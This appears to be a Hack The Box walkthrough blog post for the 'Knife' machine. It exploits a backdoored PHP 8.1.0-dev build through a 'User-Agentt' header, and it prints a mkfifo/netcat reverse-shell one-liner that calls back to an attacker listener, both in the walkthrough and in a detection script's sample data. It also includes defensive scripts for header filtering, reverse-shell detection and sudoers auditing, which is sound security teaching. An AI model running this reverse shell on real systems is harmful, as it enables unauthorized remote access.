[Hack-The-Box] ~ Knife Walkthrough

Dervish
3 min read, Jul 21, 2021

Knife is one of the easy active HTB machines, and in this walkthrough I go through it to find the user and root flags. Once we make sure we are connected to Knife via VPN from our local network, we run an nmap scan to find open ports. There were two open ports, 22 (SSH) and 80 (HTTP). I looked around the web pages and did not find enough information there.

If you know nikto, it is a very cool tool for scanning port 80 to find more vulnerabilities. I found an interesting weakness: the server reports PHP/8.1.0-dev. Once we search for that version on Google, it turns out it may allow remote code execution.

After some research on Google and exploit-db.com, I realized that the PHP version is the weak point here, and there is a Python script to exploit it, which I downloaded from there:
https://www.exploit-db.com/exploits/49933

"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host."
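From the defender's side, the detail that matters in that description is the trigger: a request header named User-Agentt (the normal User-Agent plus an extra t). The script below is an added example, not code from the exploit or from the box. It parses raw HTTP requests and flags that header so a reverse proxy or IDS rule can drop or alert on it, and it checks a response's X-Powered-By value for the backdoored build, which assumes the server leaks its PHP version in that header the way scanners like nikto read it. All traffic in it is constructed for the demo.

```python
"""Spot the PHP 8.1.0-dev backdoor trigger before it reaches the application.

Added example for this walkthrough, not code from the exploit or the box.
The backdoor is armed by a request header named "User-Agentt"; a gateway can
reject or alert on that name. The version check assumes the server leaks its
PHP build in X-Powered-By. All traffic below is constructed for the demo.
"""
from typing import List, Tuple

BACKDOOR_HEADER = "user-agentt"      # header name that triggered the backdoor
BACKDOORED_BUILD = "PHP/8.1.0-dev"   # the build that shipped with it

# Constructed sample requests (not captured traffic); payload values are placeholders.
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: curl/7.68.0\r\n"
    b"User-Agentt: <constructed-placeholder>\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: knife.htb\r\nuser-agentt: <constructed-placeholder>\r\n\r\n",
]


def parse_request_headers(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Return (request line, [(name, value), ...]) for a raw HTTP/1.x request.

    Headers are kept as an ordered list rather than a dict so that duplicated or
    near-duplicate names, the very thing we want to catch, are never merged away.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers: List[Tuple[str, str]] = []
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # blank or malformed line; a strict gateway would reject instead
        headers.append((name.strip(), value.strip()))
    return request_line, headers


def find_backdoor_header(raw: bytes) -> List[str]:
    """Names (as sent) of every header matching the trigger, case-insensitively."""
    _, headers = parse_request_headers(raw)
    return [name for name, _ in headers if name.lower() == BACKDOOR_HEADER]


def is_backdoored_php_build(x_powered_by: str) -> bool:
    """True when a response's X-Powered-By value advertises the backdoored build."""
    return x_powered_by.strip() == BACKDOORED_BUILD


def triage(requests: List[bytes]) -> List[Tuple[int, str]]:
    """Index and reason for every request a gateway should drop or alert on."""
    findings = []
    for i, raw in enumerate(requests):
        hits = find_backdoor_header(raw)
        if hits:
            findings.append((i, "backdoor trigger header present: " + ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_REQUESTS):
        print(f"request {idx}: {reason}")
    print("PHP/8.1.0-dev flagged:", is_backdoored_php_build("PHP/8.1.0-dev"))
```

Header names are case-insensitive in HTTP, which is why the comparison lowercases them; a filter that only matched the exact spelling "User-Agentt" would miss the lowercase form. Blocking at the proxy is a stopgap; the real fix is not running a development build of PHP on a reachable server.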

The pseudo shell we get has a garbage-output issue. Let's try a reliable reverse shell instead.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f

Before running it, we put port 1234 on our own machine (10.10.14.4) into listening mode. Then, from the pseudo shell on the box, we run the reliable command above and the box connects back to our listener.
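That mkfifo/netcat one-liner is also a very recognisable thing to catch on the host. The script below is an added example, not part of the original post: it scores process command lines against a handful of indicators and only raises an alert when an interactive shell is wired to netcat, so a plain port check or a lone "bash -i" does not fire. It assumes you already collect command lines from the host (auditd execve records, an EDR's process-creation events, or a shell audit log); the events in it are constructed for the demo, using the command from this walkthrough as the hostile one.

```python
"""Flag the mkfifo/netcat reverse-shell pattern in process-execution telemetry.

Added example for this walkthrough, not code from the original post. It
assumes you already collect command lines from the host (auditd execve
records, an EDR's process-creation events, or a shell audit log); the events
below are constructed for the demo, using the command from the walkthrough.
"""
import re
from typing import List, Tuple

# Each indicator is judged against the whole command line, so the pipeline as a
# unit is scored rather than any single token.
INDICATORS = [
    ("named_pipe", re.compile(r"\bmkfifo\b")),
    ("netcat", re.compile(r"(?:^|[\s|;&])(?:nc|ncat|netcat)\b")),
    ("interactive_shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")),
    ("stderr_to_stdout", re.compile(r"2>&1")),
]

# Constructed events: (host, command line). Only the first is hostile.
SAMPLE_EVENTS = [
    ("knife", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f"),
    ("knife", "nc -z localhost 22"),                     # port check, no shell
    ("knife", "bash -i"),                                # interactive shell, no network
    ("knife", "mkfifo /tmp/build.pipe"),                 # named pipe, nothing attached
    ("knife", "cat /var/log/syslog | sh -c 'wc -l'"),    # pipe into a shell, no network
]


def indicators_in(cmdline: str) -> List[str]:
    """Labels of every indicator present in the command line."""
    return [label for label, pat in INDICATORS if pat.search(cmdline)]


def is_reverse_shell(cmdline: str) -> bool:
    """The signature is an interactive shell whose stdio is wired to netcat.

    Requiring both halves keeps a lone port probe ('nc -z ...') or a plain
    'bash -i' from firing; the mkfifo and 2>&1 indicators add confidence
    but are not required.
    """
    found = set(indicators_in(cmdline))
    return "netcat" in found and bool(found & {"interactive_shell", "pipe_to_shell"})


def alerts(events: List[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """(host, command line, indicators) for each event that matches."""
    return [(h, c, indicators_in(c)) for h, c in events if is_reverse_shell(c)]


if __name__ == "__main__":
    for host, cmd, found in alerts(SAMPLE_EVENTS):
        print(f"[{host}] reverse shell suspected ({', '.join(found)}): {cmd}")
```

Run against the sample events it alerts once, on the walkthrough's command, listing all five indicators; the four benign lines each hit at most one indicator and stay quiet. In practice you would feed it the proctitle or argv field of your process events rather than a hard-coded list.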

The interesting thing is that once we check sudo for the 'james' user, we also get a privilege escalation to root.
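The root step comes down to a sudo rule, and that is something an administrator can audit before anyone lands on the box. The script below is an added example, not from this walkthrough: it parses sudoers-style rules and reports every user or group that can reach root through them, distinguishing full root, passwordless commands, and commands that simply need review. The configuration in it is constructed for the demo (the binary name is a placeholder) and is not the real rule on Knife.

```python
"""Audit sudoers rules for entries that give a user a path to root.

Added example, not from the walkthrough. The rules below are constructed for
the demo and are not the real configuration of the Knife box.
"""
import re
from typing import List, NamedTuple, Tuple


class SudoRule(NamedTuple):
    user: str          # user, or %group
    run_as: str        # target user, e.g. "root" or "ALL"
    nopasswd: bool     # NOPASSWD tag present
    commands: List[str]


# user  host=(runas[:group])  [TAG: ...]  cmd, cmd
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*"
    r"\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

SAMPLE_SUDOERS = """\
# constructed demo config, not the real Knife box
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/example-tool   # hypothetical binary
backup  ALL=(root) /usr/bin/rsync
"""


def parse_sudoers(text: str) -> List[SudoRule]:
    """Parse user/group rules; Defaults, aliases and includes are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                                  # not a plain rule line
        # "(ALL:ALL)" -> "ALL"; an empty "()" means root by default
        run_as = m.group("runas").split(":")[0].strip() or "root"
        tags = {t.strip(":") for t in m.group("tags").split()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append(SudoRule(m.group("user"), run_as, "NOPASSWD" in tags, cmds))
    return rules


def review(rules: List[SudoRule]) -> List[Tuple[str, str]]:
    """(principal, finding) for every rule that can be used to run as root."""
    findings = []
    for r in rules:
        if r.user == "root" or r.run_as not in ("ALL", "root"):
            continue                                  # already root, or cannot become root
        if r.commands == ["ALL"]:
            findings.append((r.user, "can run any command as root"))
        elif r.nopasswd:
            findings.append((r.user, "passwordless root for: " + ", ".join(r.commands)))
        else:
            findings.append((r.user, "root for: " + ", ".join(r.commands) + " (review the binary)"))
    return findings


if __name__ == "__main__":
    for principal, finding in review(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{principal}: {finding}")
```

Any single command run as root deserves a look, password or not, because what matters is whether that command can be made to run something else; the NOPASSWD tag just removes the last speed bump. On a real system, feed it the output of visudo -c -f or the files under /etc/sudoers.d rather than the embedded sample.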

Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.

Follow me :

Twitter: https://twitter.com/DervishUludag


Dervish

Application Security Engineer | Learning Ethical Hacking | Security+ | CEH